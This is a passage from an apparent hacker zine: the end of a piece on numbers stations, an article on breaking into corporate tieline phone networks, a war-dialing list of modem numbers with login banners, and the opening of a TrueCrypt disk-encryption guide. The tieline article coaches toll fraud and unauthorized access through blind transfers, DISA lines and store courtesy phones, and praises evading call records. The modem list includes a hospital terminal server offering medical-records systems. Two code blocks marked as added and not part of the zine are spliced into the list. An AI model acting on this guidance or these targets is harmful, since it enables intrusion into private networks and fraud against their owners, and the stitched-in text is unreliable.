Cuba". In 2006, Carlos Alvarez and his wife Elsa Alvarez were arrested and charged with espionage.
The U.S. District Court Florida stated: "defendants would receive assignments via shortwave radio
transmissions". In June 2009, the United States similarly charged Walter Kendall Myers with
conspiracy to spy for Cuba and receiving and decoding messages broadcast from a numbers station
operated by the Cuban Intelligence Service to further that conspiracy.[2][3]
It has been reported that the United States uses numbers stations to communicate encoded information
to persons in other countries.[1]
Numbers stations appear and disappear over time (although some follow regular schedules), and their
overall activity has increased slightly since the early 1990s. This increase suggests that, as
spy-related phenomena, they were not unique to the Cold War."
- http://en.wikipedia.org/wiki/Numbers_station
"A search of Commission records located a number of documents concerning "the operation of domestic
and foreign numbers stations." No records were found, however, with respect to the decoding of the
messages that numbers stations broadcast. The records responsive to your request must be withheld
under FOIA Exemption 7(E), 5 U.S.C. § 552(b)(7)(E); see 47 C.F.R. § 0.457(g)(5), which permits us to
withhold records where release would "disclose techniques and procedures for law enforcement
investigations or prosecutions, or would disclose guidelines for law enforcement investigations or
prosecutions if such disclosure could reasonably be expected to risk circumvention of the law[.]"
We have also reviewed the records to determine if any parts may be released and concluded no
portions of the records may be segregated and released. See 5 U.S.C. § 552(b) (sentence immediately
following exemptions); Memorandum for Heads of Executive Departments and Agencies, Freedom of
Information Act, 74 FR 4683 (2009) (President Obama's memorandum concerning the FOIA); Memorandum
for Heads of Executive Departments and Agencies, Freedom of Information Act,
http://www.usdoj.gov/ag/foia-memo-march2009.pdf, (Attorney General Holder's FOIA Memo)."
When we spoke to an attorney at the FOIA office over the phone, he requested a 30-day extension due
to the sheer amount of information uncovered.
Interesting.... The government won't even release redacted documents on the topic.
Not to worry; we're working on it. More to come.
[==================================================================================================]
-=[ 0x08 Exploring Tieline Networks
-=[ Author: Shadytel, Inc
-=[ Website: http://www.shadytel.com/
Anybody who hasn't been living under a rock is familiar with PBXes - the smaller, more compact
business phone systems we know and love (particularly all you shady folks who need an easy way to
conceal ANI). While PBX manufacturers learned over a decade ago that prohibiting a blind transfer to
9+anything is an easy way to put an end to this mischief, the digit 8 is a completely different
story. 8 will often give you a second dialtone, but a very different one.
Long distance for businesses has never been cheap for anyone, not even the providers. Extra "because
we can" fees aside, businesses use far too many minutes to make an unlimited plan profitable for all
but the dodgiest carriers. That's where tielines come in. Sometimes, it makes more sense to make
your own network if most of your calls are between different branches. Not only do the calls only
cost whatever it takes to keep the equipment running, but you can make the dialplan whatever the
hell you like. Rather than having separate digits for tieline/PSTN outdial, a company could have the
PBX catch 1-700-222-xxxx and assign different stores their extensions based on the store ID.
Eventually, long distance companies started realizing that everybody liked the idea of a tieline,
but nobody liked the idea of laying cable or provisioning switches. For this reason, most of what
you'll find will end up going over a conventional long distance carrier anyway (with special pricing
arrangements), but depending on where you look, what you'll find will end up being very different.
On one end of the spectrum is Macy's and their shiny new IP tieline network (or more accurately, a
Sprint corporate account dubbed the Federated Tieline Network). This baby features interactive "not
in service" messages, voice directories, and Rolm PBXes. On the other end is the Dominion tieline
network. Dominion's network, before being sold to Cavalier Telephone, was completely homemade. The
fiber spanning from New York well into the dirty South was in-house, the switches were in-house, and
the ancient, sometimes not even digital PBXes mostly interconnected by 4-wire analog trunks to the
PSTN are most definitely still alive, kicking, and retrofitted with equally ancient voicemail
systems; mostly either Siemens, or pre-Avaya Octel. In a twist of bitter irony, the Dominion network
sounds consistently better.
Getting in
-----------
If you've ever spent more than two minutes scanning, playing with some doohickey you found on the
network, or otherwise, well, anything, you probably know how hard it is to stick to a plan. You can
never predict security flaws or outright generosity. The tieline world is pretty much the same.
Unless you're absolutely sure whichever PBX stands between you and a tieline is vulnerable, you'll
be a lot better off poking across multiple businesses than just pounding your head against one.
While it isn't always absolute, keep in mind that large corporate customers aren't just big users of
tielines - they're also big fans of standardized software/hardware configuration. If you find one,
you can most certainly find them all, but if you're not having any luck with two or three PBXes
owned by the same company, it's a safe bet that you'll have a far more rewarding experience with
something else. Be sure, though, that any of this is even necessary. Companies like IBM leave their
tieline open to anyone. Whenever you transfer to someone in the company, the IVR gives you the
option of transferring to a tieline extension instead.
Asking nicely
-------------
Before even trying to pull leet hax on your local PBX, try it! If it's worked for people getting
onto store PA systems for over 15 years, it can most definitely work for you. As compelling as the
word "please" can be, knowing what they actually call the tieline is a hundred times more
compelling. Every company we've encountered so far will refer to a tieline on the 8 level as 'tieline 8',
but if you're not sure, you can always snag yourself an extension card. Failing that, even a Google
search will go a long way. For example, "tieline 8" +IBM (with quotes) will find you emails from IBM
employees giving their 7-digit tieline extensions for contact. Macy's/Bloomingdale's/other companies
under the same corporate umbrella refer to their tieline as Fednet (no obvious relation to efNet,
but we suspect otherwise) and have a full ten-digit dialing plan.
Blind Transfer
--------------
As the name implies, a blind transfer is an operation done by an IVR where it'll just flash over,
give the PBX an extension, and with absolutely no checking at all will drop out, leaving you to
whatever illicit goodies you're about to obtain. As we established earlier, PBX manufacturers have
taken care to ensure the one thing that's guaranteed to piss off their customers won't happen, but
it's otherwise wide open.
Conference calls
----------------
Corporate conference calls will more often than not have a tieline extension to avoid busying out
their PSTN lines (while saving money in the process). Fortunately for us, a number of these are
extra special conference circuits with dialout capabilities. While finding these is an effort we
leave to the reader (they're real though, we swear!), imagine the benefits. How cool would it be to
gather all your leet phreakz0r buddies onto a private long distance network? Especially if a long
distance security department is "service observing" one of your friends on a conference call.
Physical Access
---------------
It sounds stupid, but if you need to place one call or want to verify something before going through
the trouble of gaining remote access, it's a good idea. Most large stores have a number of
unattended phones. Target even encourages you to use them if you need assistance. A number of Macy's
stores will have courtesy phones with tieline access in the dressing room areas. Just remember that
you're not the first person to do shady things near a dressing room, and there is a camera pointing
straight at you. This means plugging your computer into the phone line will trigger a security guard
to magically appear.
Let's say this particular Macy's - or any other store you may happen to be at - doesn't have a
courtesy phone, and all you have to work with is a phone with a hotline arrangement. In most Macy's,
this is pretty popular. There'll be phones in an out-of-the-way location, usually near an elevator,
marked with something like "Pick up to be connected to the Macy's credit line" specifically for
customers to use. Depending on the store configuration, you'll see either a Rolm PBX phone with a
magnetic (not visible) hookswitch, or a Western Electric 2554 clone. Either way, when you pick up the
phone, you'll be greeted with several seconds of silence, and finally, an IVR with some horrible
CELP codec: "Hello, and thank you for calling the Macys credit line! If you think Shadytel is great,
press one. Otherwise, please record all your personal information after the tone, and a
representative will reimburse your card with advertising revenue."
If you're on a 2554 clone: Just flash and you'll be greeted with dialtone!
If you're on a Rolm PBX phone: Look near the bottom for three line buttons. If they're not labeled,
either making an attempt to transfer (right-most button), or pressing connect (center) will get you
a PBX dialtone.
For the most part, these phones seem to not have any restrictions. Tieline access is unrestricted,
but dialout is a little perplexing. From the stores we've tried it from, you can simply dial 800
numbers as 9+, and they'll go through without a problem. Local calls seem to be another story. The
PBX will wait for a few moments, presumably for extra digits, and then give you its version of
reorder.
DISA
----
DISA, or Direct Inward System Access, is a PBX function usually only found on larger systems, both
new and old. Fortunately for us, the companies that have PBX DISAs are also the very same ones who
have tielines!
So acronyms aside, a DISA is like an extender. Imagine being in the headquarters of Megacorp USA and
finding a courtesy phone in their lobby, but being able to be at that phone from anywhere in the
world by dialing a phone number.
Well, are you going to let a phone that the general public uses have unrestricted access to the
network? Of course not - that phone is going to be locked down like a maximum security prison. So,
that's pretty much a DISA. Imagine being able to be at that phone from anywhere in the world simply
by dialing a phone number. Only, without the being supervised part. Or the having to be
identifiable part.
Locked down or not, that DISA gives you an advantage. Instead of looking like any other outside
caller, you instead look like someone calling from inside the network. To the employees, the PBX -
EVERYTHING. Except the DISA itself. Depending on the PBX type, it might give you some social
engineering opportunities or access to some interesting vertical service codes, but that still
doesn't solve your problem.
Well, it wouldn't just give you the unrestricted ability to access the rest of the network if you
called the DISA from what looks like an inside line, would it? Yes, some PBX manufacturers (we're
looking at you, Avaya!) have some serious explaining to do.
Getting Around
--------------
Sometimes getting around in a tieline dialplan is easy. Like on Fednet, if you dial an invalid
number, an IVR will intercept you and offer you a directory. Sorta like Clippy, only with less urge
to kill it.
Other times, it's convoluted, fucked up, and just plain mean. Since the network that's both the most
interesting and the most confusing happens to be the one we're most experienced with, we'll use the
Dominion network as an example. The moment you or whatever you have doing your evil bidding presses
8, you'll be taken right out of the office and onto the endless pile of confusion that is a Dominion
tieline switch. The very basic topology of it all (end office/PBX --> tieline switch/tandem--> end
office/PBX) is pretty much the only part of it that makes sense.
If you think like us, the first thing you'll think to press is 0. No matter where you go, 0 always
goes to something, no questions asked. Not here. In fact, nothing will happen at all. The dialtone
will just keep on going, but it'll stop accepting digits. Better get used to it. If you don't
respond within seven seconds or so of getting dialtone or start dialing a prefix the tieline switch
doesn't like (555-xxxx will do it), it'll do the exact same thing. Fear not, though - it's not all
bad. If you're trying to search around for a working tieline exchange, it's pretty easy to tell if
you've actually found something or if you're just stumbling around in the dark.
The way exchanges are formatted within the Dominion network are a little like Russia's PSTN. The
exchange itself is a bit like a container for a number of sub-exchanges, but it's provisioned
geographically, a bit like an area code. Every tieline switch knows that Eastern Node #2, serving
northern Virginia, handles the codes 723 and 724, so they'll pass anything within those two codes to
it. If you dial a non-working sub-exchange in 723/724, you'll get a recording from Eastern Node #2.
Dominion doesn't have it set up like most SS7-enabled networks where the terminating long distance
tandem will send a cause code with a non-working number condition back to the originating long
distance tandem. If you dial a non-working number within 724-39xx, you'll get a recording from
Portsmouth Tech Center #3, the PBX serving that hundred block.
So to recap, it works like this:
Invalid exchange --> The tieline switch placing your call gives you a recording
Invalid sub-exchange --> The tieline switch placing your call sends it to the tieline switch serving
the exchange, which gives you a recording
Invalid extension --> Wrong number message from the PBX you're trying to call
Figuring out which tieline switch you're sending your calls from is pretty simple. As of this
writing, 425 and 699 are both non-working codes, so anything within either of those two will get you
the recording from your tieline switch.
While we're on the topic of Dominion, here are a few things to keep in mind, should you ever work
your way into their twisted corporate ladder.
- The non-working extension recording for their corporate headquarters tells you to "consult
your Internet or telephone directory". Do they really mean Internet or intranet?
- If you're calling from the tieline network, it's very possible your call might look exactly
like a call from within the same building. We've had attendants offer to "come over there and
help us".
- There really are some form of at least pseudo-electromechanical switches on the network, like
724-00xx.
- 736-4636 (or 804-771-4636 via PSTN) is their IT help line.
Benefits
--------
Other than for the fun of exploration, why would you want to gain access to a tieline? As you're
more than likely a residential customer (unless you happen to want ISDN and live somewhere where
it's only tariffed as a business service), why on earth would you need to travel through a tieline
network?
In all seriousness, the best answer to this question boils down to two words: FOR SCIENCE! Like a
toy, you probably don't want access to a tieline because it's going to be of any financial value.
You want it because it's fun. The switching equipment that runs a homegrown tieline network is
unlike anything else. The equipment is completely unregulated. You can make a switch out of
mousetraps and put it in your network, or route calls based on some convoluted numbering scheme that
not even Soviet Union dictators can understand. If you need an even better reason, keep in mind that
unregulated means no CALEA. If you want to re-originate a call from Alaska while lying in your
Kaiser Permanente hospital bed, then... well, dammit, good for you. The network is going to be more
than likely unprepared for call log subpoenas (if it even carries ANI at all). If you want to
perform an insane corporate espionage feat, could you get any more convincing than having
slack-jawed Red Thomas call from the Hill Valley drilling site?
Oh, did we mention the DSN is a tieline network?
So let's just put it this way - what you do with a tieline is limited to your resourcefulness.
The end.
[==================================================================================================]
-=[ 0x09 Modem Numbers
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
The following is a list of modems from various scans posted to the site, along with scans from the
Scan A Day project. The Scan A Day project was conceived on the BinRev forum by samo in late 2008
but unfortunately lost steam about a year later. The project and content archive has since been
handed off to GNY and can be found at http://scanaday.gonullyourself.org/ .
Numbers within this list that were not scanned by me were submitted to GNY or Scan A Day by
ThoughtPhreaker, samo, whye, Lucky225, and Decimalz.
The CNAM result of each number has also been included. Comments are preceded with #.
All connections were made at 1200 baud, 8N1 unless noted otherwise.
If you are interested in dialing some of these numbers, then check out HyperTerminal, a program able
to dial out from and interface with modems. You may have a usable modem in your desktop or laptop
and not even realize it!
================================================================================
207-324-9906
VERIZON
M857tM857tM857tM857tM857tM857tM857t
================================================================================
212-202-0000, 7E1
New York NY
Welcome to your internet access switch
Unauthorized access is not permitted
Please enter your name and password at the prompt
Login:
================================================================================
212-287-0000
REUTERS AMERICA
# The repeating text looks like a PPP LCP Configure-Request being retransmitted over and over
# (note the identifier byte after the first }! counting up), i.e. an access server waiting for a
# PPP peer that never answers.
~ }#¿!}!}!} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30»Ω~~ }#¿!}!
}"} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30ÅJ~~ }#¿!}!}#} '}"}
&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30I‡~~ }#¿!}!}$} '}"}&} }*} }
}#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30}"¨~~ }#¿!}!}%} '}"}&} }*} } }#}%¬#
}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30 }&~~ }#¿!}!}&} '}"}&} }*} } }#}%¬#}%}%}&l
<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30ÉÒ~~ }#¿!}!}'} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}
(}"}1}$}%Ù}3}*}!EDTRH30K[~~ }#¿!}!}(} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}
%Ù}3}*}!EDTRH30}5i~~ }#¿!}!})} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}
!EDTRH30›√~~ }#¿!}!}*} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30
î4~~ }#¿!}!}+} '}"}&} }*} } }#}%¬#}%}%}&l<Å,}'}"}(}"}1}$}%Ù}3}*}!EDTRH30\û~
================================================================================
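Added example, not part of the zine: a small decoder for what the 212-287-0000 dump contains when read as raw bytes. In RFC 1662 HDLC-like framing `~` is the 0x7E flag and `}` the 0x7D escape (`}#` is 0x03, `} ` is 0x00, `}!` is 0x01), `0xC0 0x21` after the control byte is the LCP protocol, and the rest decodes as a Configure-Request whose identifier byte rises by one per frame. The option bytes in `lcp_configure_request` are transcribed from the page's dump; the address byte, the magic number and the FCS are assumed or recomputed here, and `CAPTURE` is a constructed stand-in for the real capture.

```python
"""Decode the "repeating text" captured from 212-287-0000.

Added example, not from the zine. The option bytes are transcribed from the
page's 8-bit dump; address byte, magic number and FCS are assumed/recomputed.
"""
FLAG, ESC, LCP = 0x7E, 0x7D, 0xC021
LCP_CODES = {1: "Configure-Request", 2: "Configure-Ack", 3: "Configure-Nak",
             4: "Configure-Reject", 5: "Terminate-Request", 9: "Echo-Request"}
AUTH = {0xC023: "PAP", 0xC223: "CHAP"}
CHAP_ALG = {5: "-MD5", 0x80: "-MSv1", 0x81: "-MSv2"}
INT_OPTS = {2: "ACCM", 5: "Magic-Number", 17: "MRRU"}
FLAG_OPTS = {7: "PFC", 8: "ACFC"}

def _fcs_table():
    table = []
    for b in range(256):
        v = b
        for _ in range(8):
            v = (v >> 1) ^ 0x8408 if v & 1 else v >> 1
        table.append(v)
    return table
_TABLE = _fcs_table()

def fcs16(data, fcs=0xFFFF):
    """RFC 1662 frame check sequence; a frame plus its own FCS hashes to 0xF0B8."""
    for b in data:
        fcs = (fcs >> 8) ^ _TABLE[(fcs ^ b) & 0xFF]
    return fcs

def hdlc_frame(payload):
    """What the access server transmits: FCS appended, bytes stuffed, flags around."""
    fcs = fcs16(payload) ^ 0xFFFF
    raw = payload + bytes([fcs & 0xFF, fcs >> 8])      # FCS goes out low byte first
    out = bytearray([FLAG])
    for b in raw:
        if b < 0x20 or b in (FLAG, ESC):               # default ACCM escapes all controls
            out += bytes([ESC, b ^ 0x20])
        else:
            out.append(b)
    out.append(FLAG)
    return bytes(out)

def hdlc_unframe(stream):
    """Split a raw capture into (frame, fcs_ok) pairs, undoing the 0x7D stuffing."""
    frames, buf, esc = [], bytearray(), False
    for b in stream:
        if b == FLAG:
            if len(buf) >= 4:                           # ignore the empty '~~' gap
                frames.append((bytes(buf[:-2]), fcs16(buf) == 0xF0B8))
            buf, esc = bytearray(), False
        elif b == ESC:
            esc = True
        else:
            buf.append(b ^ 0x20 if esc else b)
            esc = False
    return frames

def parse_lcp(frame):
    """Decode address/control/protocol and, for LCP, code, id, length and options."""
    proto = int.from_bytes(frame[2:4], "big")
    info = {"address": frame[0], "control": frame[1], "protocol": proto}
    if proto != LCP:
        return info
    code, ident = frame[4], frame[5]
    length = int.from_bytes(frame[6:8], "big")
    body, options, i = frame[8:4 + length], [], 0
    while i + 2 <= len(body):
        t, l = body[i], body[i + 1]
        if l < 2:                                       # malformed option: stop, never loop
            break
        v = body[i + 2:i + l]
        if t in INT_OPTS:
            options.append((INT_OPTS[t], int.from_bytes(v, "big")))
        elif t in FLAG_OPTS:
            options.append((FLAG_OPTS[t], True))
        elif t == 3:
            ap = int.from_bytes(v[:2], "big")
            alg = CHAP_ALG.get(v[2], "") if ap == 0xC223 and len(v) > 2 else ""
            options.append(("Auth-Protocol", AUTH.get(ap, hex(ap)) + alg))
        elif t == 19:
            options.append(("Endpoint-Discriminator", v[1:].decode("ascii", "replace")))
        else:
            options.append((f"type-{t}", v.hex()))
        i += l
    info.update(code=LCP_CODES.get(code, code), id=ident, length=length, options=options)
    return info

def lcp_configure_request(ident):
    """One of the captured requests, rebuilt from the transcribed options."""
    opts = (bytes([2, 6, 0x00, 0x0A, 0x00, 0x00])      # ACCM 0x000A0000: escape XON/XOFF
            + bytes([3, 5, 0xC2, 0x23, 0x05])           # auth: CHAP with MD5
            + bytes([5, 6, 0x6C, 0x3C, 0x81, 0x2C])     # magic number as read from the dump
            + bytes([7, 2, 8, 2])                       # PFC, ACFC
            + bytes([17, 4, 0x05, 0xF4])                # MRRU 1524
            + bytes([19, 10, 1]) + b"EDTRH30")          # endpoint discriminator, class 1
    body = bytes([1, ident, 0x00, 4 + len(opts)]) + opts
    return bytes([0xFF, 0x03, 0xC0, 0x21]) + body

# Constructed stand-in for the capture: three unanswered requests, ids 1..3.
CAPTURE = b"".join(hdlc_frame(lcp_configure_request(i)) for i in (1, 2, 3))

def decode_capture(stream=CAPTURE):
    return [dict(parse_lcp(f), fcs_ok=ok) for f, ok in hdlc_unframe(stream)]
```

Running `decode_capture()` on the constructed stream gives three Configure-Requests of length 39 (the `} '` in the dump), each asking for CHAP-MD5 authentication, an MRRU of 1524 and a locally assigned endpoint discriminator of "EDTRH30"; the stuffed bytes reproduce the `}3}*}!EDTRH30` visible on the page. The practical point for a scanner: a banner that looks like this is a PPP server, not noise, and it will only talk further to a PPP client that can answer the CHAP challenge.
================================================================================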
212-336-0000
WELLPOINT INC
# Television station in New York
WPNY
2.6.11-AV18login:
================================================================================
212-342-0000
NEW YORK PRESBY
# Looks like an access point to a network of universities - this thing is crazy-interesting. The
selections I made went to login prompts.
************************************************************************
* AUTHORIZED USE ONLY *
* Any use of this system is logged and monitored. Trespassers and *
* unauthorized users will be prosecuted to the fullest extent of *
* the law. If you are not supposed to be here: Leave Now! *
************************************************************************
[whitespace]
Server "isdn-pri-gw" Line 73 Terminal-type (unknown)
************************************************************************
* *
* NYP TERMINAL SERVER AT CUMC *
* --------------------------- *
* AUTHORIZED USE ONLY *
* *
* Any use of this system is logged and monitored. Trespassers and *
* unauthorized users will be prosecuted to the fullest extent of *
* the law. If you are not supposed to be here: Leave Now! *
************************************************************************
1 Laboratory System (CPBX)
2 Radiology System (CPRAD)
3 Medical Records (Intellus System) (CPMR)
4 Pocket Signout Editor (PSE) (WASH)
5 Columbia University E-Mail System (CUNIX)
6 ATT Route Server
7 FLUX (SSH ONLY)
8 West Campus Mainframe (PHIS)
9 East Campus Cerner System (JURASSIC)
10 East Campus Cerner System (BRONTO)
11 East Campus Cerner System (STEGO)
12 East Campus TREX System
13 Siemens Eagle System
18 Disconnect
Selection:
================================================================================
212-495-0105
COMPUTERSHARE,G
# Computershare is a data management and financials company.
NYCSCYC1!login:
================================================================================
254-939-4471
BELTON SHPG CTR
U™U™"^Ÿ
================================================================================
254-939-4475
CRESTV MANOR NR
~?~?~?~?~?~?~?~?~?~?~ø´U`By`ŸøÂd3Ngìh5ô
[whitespace]
@ ƒZˆﬂ‡Gâ¿ƒ>Î~?‡-;=N2ç2H˝5i§M:k
(eUâ8±Kî®L[êi-KzVÉi2
================================================================================
254-939-9732
Belton TX
couldn't connect successfully
================================================================================
315-287-9935
NYS DEPT OF COR
# New York State Department of Correctional Services, apparently
[blank, type LOGIN for login]
================================================================================
360-330-0005
QWEST CORP
# Weird ? prompt
?
================================================================================
360-330-0010
QWEST COMM
# Weird ? prompt
?
================================================================================
360-330-0016
QWEST CORP
# Weird ? prompt
?
================================================================================
360-330-0061
Centralia WA
couldn't connect successfully
================================================================================
503-266-1056, 7E1
Canby OR
# Earthquake monitoring station
CONNECT 9600
INVALID USERID
PLEASE ENTER USERID FOR CNBY
<
================================================================================
503-266-1057
Canby OR
[blank]
================================================================================
518-732-2921
# COCOT payphone
NNN
================================================================================
715-386-0020
HUDSON HOCKEY A
[blank]
================================================================================
715-386-0053
Hudson WI
# Weird < prompt
<
================================================================================
715-386-0055
Hudson WI
# Weird < prompt
<
================================================================================
757-430-9920
PAYPHONE
[blank]
================================================================================
757-543-9997
LUCENT TECH
# Perhaps the banner is a serial number? It returns no Google results.
STA06214028
login:
================================================================================
757-865-9922
CORP BLLNG BELL
wFKoff€∆ñäu2=ÏRì˘ XÂÉÒﬂ∆Uva°R˘˘◊∑MÔﬁÖÖI˝Ã+◊‡∫I˙Ñ•ƒ¡M
================================================================================
775-289-0002
ATT
# Identified by RP as an FDMA radio PBX
COLLINS EXCHANGE RADIO
CXR-424
***** MAIN MENU *****
1. SYSTEM PROVISIONING
2. RADIO CHANNEL STATUS
3. SUBSCRIBER LINE STATUS
4. SUBSCRIBER TERMINAL STATUS
5. ALARM STATUS
6. PERFORMANCE REPORTS
7. DIAGNOSTICS
8. INSTALLATION
9. CHANGE PASSWORD
10. LOG OFF
Enter selection number and return key [ ]
================================================================================
775-289-0017
Bell Nevada
couldn't connect successfully
================================================================================
800-226-1337
A§5:JÉÎéòäl∑[Q\Î ã:IY˛¢gßn≈∞âÙ–Nß8≠‰Å€2?Ú¶·ÁP j]F
================================================================================
800-236-2622
# Haha, a dial-up toll-free BBS!
Auto-sensing...
WELCOME!
hpprwhwbbs (#58817025)
Running Worldgroup by GALACTICOMM
ONLINE 9600 BAUD AT 17:19 09-AUG-10
If you already have a User-ID on this
system, type it in and press ENTER.
Otherwise type "new":
================================================================================
800-456-6855
[blank]
================================================================================
800-468-2622
g£¿ÔË˙∆rK– »ÉjÑöÿπËÌ¿lÖYÒ|ΩôˆÇÔ´y∂íœtÅ?HóÕÙ≈ú¶•N`
================================================================================
800-507-9935
IrYKFN>~ytv
gXYfbU*sL3IYm35I1J|lLU8EUUIdES0wC*4N{[
[whitespace]
iT
E</Zj %pH<
[whitespace]
~?~?~?~?~?~?~?~?~?~?~?ﬂ®6saπ›ŒKÅ‰e;.Ê@ ê[œ~?ﬂ‡«ƒ@ÔÁ~?CëQL3Tç$î¥UP≥U§¢çÑ±
ÌöçTCT∂3XB4F9ÇF_
================================================================================
800-535-9935
couldn't connect successfully
================================================================================
800-543-9935
couldn't connect successfully
================================================================================
800-761-1337
# DOW Networks is a telecommunications services provider.
------------------------------------------------------------
This gateway is the property of DOW Networks.
All unauthorized access is strictly forbidden!
------------------------------------------------------------
Username:
================================================================================
800-801-6855
couldn't connect successfully
================================================================================
800-810-6855
[blank]
================================================================================
800-878-6855
couldn't connect successfully
================================================================================
800-888-6855
couldn't connect successfully
================================================================================
800-891-6855
couldn't connect successfully
================================================================================
847-359-9957, 7E1
LYSAKOWSKI, PET
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
?~?~?~?~?~?~?~?~?~?~?Zcu_hSr9N3n4
[whitespace]
@ Ddx_`GD@D8%?p,I&x(4%+j0&
I-*2P4)!+JNXa F
[whitespace]
K~%)HI
================================================================================
847-359-9966, 7E1
TEDDYS LIQUOR S
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
~?~?~?~?~?~?~?~?~?~?~+U@B(D~el1G3n4
[whitespace]
@ $p_`C @DF}~A%
u;5'! y#V<-J|IqjC,]eC.eVXJ%0b3Q3
================================================================================
847-359-9977, 7E1
PLUM GROVE DENT
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
~?~?~?~?~?~?~?~?~?~?+U@B(D~]n9N'3n4@ 8?N\!0AN~@E$b2bMRVE/Q
*02tJ"
"cR
[whitespace]
Qa%
================================================================================
847-359-9980, 7E1
LUMEX INC
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
~?~?~?~?~?~?~?~?~?~?~et@%&U*a,9@ d@?~n|b`"os~?@XFTV4:)#01,52, P
L!DtOEh`B(
================================================================================
847-359-9985, 7E1
Jasin Alan
# Still garbled text, but 7E1 returned more ASCII characters over 8N1
~?~?~?~?~?~?~?~?~?_$X@cu_(r9N3@ Cp 8S?n|b D8%?~p2 DE%@ADI$mUdF)
)UAD;* PIcEf
================================================================================
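Added example, not from the zine: the framing check behind the "7E1 returned more ASCII characters over 8N1" notes above. A sender using 7 data bits plus even parity, read by a modem set to 8N1, delivers its parity bit as bit 7 of every byte, so printable text arrives with the high bit set on exactly those characters that have an odd number of one bits. Testing that rule over a capture tells you whether to redial at 7E1 (or 7O1) before writing the output off as line noise. The sample bytes are constructed here, modelled on the 503-266-1056 banner; stop-bit misalignment is ignored.

```python
"""Tell a 7E1 banner apart from real line noise in an 8N1 capture.

Added example, not from the zine. Sample input is constructed.
"""
def popcount(b):
    return bin(b & 0xFF).count("1")

def as_seen_at_8n1(text, odd=False):
    """Bytes an 8N1 listener sees from a 7E1 (or, with odd=True, 7O1) sender."""
    out = bytearray()
    for ch in text.encode("ascii"):
        parity = popcount(ch) & 1          # 1 when the 7-bit char has odd weight
        if odd:
            parity ^= 1
        out.append(ch | (parity << 7))     # the parity bit lands in bit 7
    return bytes(out)

def guess_framing(data):
    """'7E1' or '7O1' if every byte obeys one parity rule, otherwise '8N1'."""
    if not data:
        return "8N1"
    weights = [popcount(b) & 1 for b in data]
    if not any(weights):                   # every byte has even weight
        return "7E1"
    if all(weights):                       # every byte has odd weight
        return "7O1"
    return "8N1"

def strip_parity(data):
    """Drop the parity bit to recover the 7-bit characters."""
    return bytes(b & 0x7F for b in data)

def recover(data):
    """(framing, text); text is decoded only when a parity framing is detected."""
    framing = guess_framing(data)
    if framing == "8N1":
        return framing, None
    return framing, strip_parity(data).decode("ascii")
```

The check is only as good as the sample size: a handful of bytes can satisfy one parity rule by accident, so collect a few dozen before trusting the verdict, and remember that a capture consisting entirely of 7-bit-clean 8N1 text with mixed weights is correctly reported as 8N1.
================================================================================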
907-848-8888
Venetie AK
# Siemens PBX prompt?
CMS>
================================================================================
907-849-8888
Venetie AK
# Siemens PBX prompt?
CMS>
================================================================================
907-967-8888
Goodnews Bay AK
# Siemens PBX prompt?
CMS>
================================================================================
909-390-0047
FRIDAY'S
[blank]
[==================================================================================================]
-=[ 0x0a Linux Full-Disk Encryption Using TrueCrypt
-=[ Author: second
-=[ IRC: irc.distrust.us #gny
-=[ IRC: irc.digitalrebels.org #null
= Introduction =
This is a HOW-TO for leaving your root filesystem encrypted.
For this I'm using Arch Linux, but it should be easy to port to other Linux distributions. I've
created a TrueCrypt init hook for mkinitcpio, the initramfs generator made for Arch Linux; many
other distros have something similar. The initramfs is basically a set of scripts and binaries run
before init to prepare the system (mount filesystems, decrypt the root filesystem, and so on; it can
even do NFS root filesystems), after which it calls init (which runs the graphical login manager,
consoles, etc.).
Pre-requisites:
* Live CD/USB or a system already running Arch Linux (you aren't restricted to Arch Linux, but
that's what I'm using. If you know what you're doing, you can reference the wiki article
http://wiki.archlinux.org/index.php/Install_from_Existing_Linux and improvise.)
* Root access
* An internet connection or local access to the TrueCrypt packages/binaries
* Patience. ALWAYS double check your commands.
It would help you to know how to:
* Use the command line
* Partition a drive
* Create a filesystem on a partition
Now that you have what you need, let's begin.
I'm going to create a bootable system on another drive that has the root filesystem encrypted with
TrueCrypt. This HowTo is intended for hard drives, but it should also work with a USB device with a
few changes.
WARNING: I am in no way responsible for your actions, data loss, or whatever.
USE THIS AT YOUR OWN RISK.
Now that the disclaimer is out of the way...
= Formatting and Partitioning The Disk =
# ls /dev/sd*
/dev/sda /dev/sda1 /dev/sda2 /dev/sdb /dev/sdb1
/dev/sdb is the drive I'll be installing to. It may be different on your system, so be sure to check
using `fdisk -l`. I suggest you have a drive that is at the very minimum 2G. 4G is better (that's
what I'm using).
First, I need to create a /boot partition and a partition for the root filesystem. I'll give /boot
300M, although it could be smaller; I tend to store other things there too sometimes.
NOTE: If your /boot is too small, you will have to come back to this step and do it over again. It
needs enough room for one kernel and two initrd which, because it's holding TrueCrypt and all the
necessary libraries for TrueCrypt, may become quite large.
== Partitioning ==
I will use fdisk for partitioning my drive. Replace /dev/sdb with whichever drive you are using.
# fdisk /dev/sdb
Command (m for help): m
Command action
a toggle a bootable flag
b edit bsd disklabel
c toggle the dos compatibility flag
d delete a partition
l list known partition types
m print this menu
n add a new partition
o create a new empty DOS partition table
p print the partition table
q quit without saving changes
s create a new empty Sun disklabel
t change a partition's system id
u change display/entry units
v verify the partition table
w write table to disk and exit
x extra functionality (experts only)
Command (m for help): o
Building a new DOS disklabel with disk identifier 0x3a67b018.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.
Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)
Command (m for help): n
Command action
